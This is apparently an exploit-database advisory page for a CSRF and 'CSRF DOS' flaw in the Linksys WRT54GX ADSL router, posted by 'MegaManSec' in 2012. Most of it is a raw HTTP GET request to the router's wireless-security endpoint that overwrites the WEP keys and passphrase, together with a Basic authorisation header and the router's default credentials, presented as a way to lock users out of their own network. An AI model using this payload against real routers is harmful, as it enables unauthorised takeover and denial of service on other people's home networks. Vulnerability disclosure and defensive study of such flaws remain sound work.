Linksys WRT54GX (ADSL Router) CSRF & 'CSRF DOS'



EKU-ID: 2740 CVE: OSVDB-ID:
Author: MegaManSec Published: 2012-10-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


###InterNot###
##MegaManSec##
##############
##############



#Title: Linksys WRT54GX (ADSL Router) CSRF & 'CSRF DOS'
#Vendor: Linksys.com
#Category: CSRF
#

###############
DOS - changing wireless password to deny the user of service :)
###############


Method:GET
URL: http://192.168.1.1/asp_setwireless_Security?passphrase=&submit_type=&submit_click=submit_click&security_mode=wep&Association_Mode=0&wl_key=1&wl_WEP_key=&wl_wep_bit=128&wl_passphrase=AAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key1=AAAAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key2=B1EAC03C7B572C75F8A231C741&wl_key3=AAAAAAAAAAAAAAAAAAAAAAAAAA&wl_key4=AAAAAAAAAAAAAAAAAAAAAAAAAA
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://192.168.1.1/
Authorization: Basic OmFkbWlu


##DEFAULT USER: BLANK
##DEFAULT PASSWORD: admin

##EASY CSRF!!!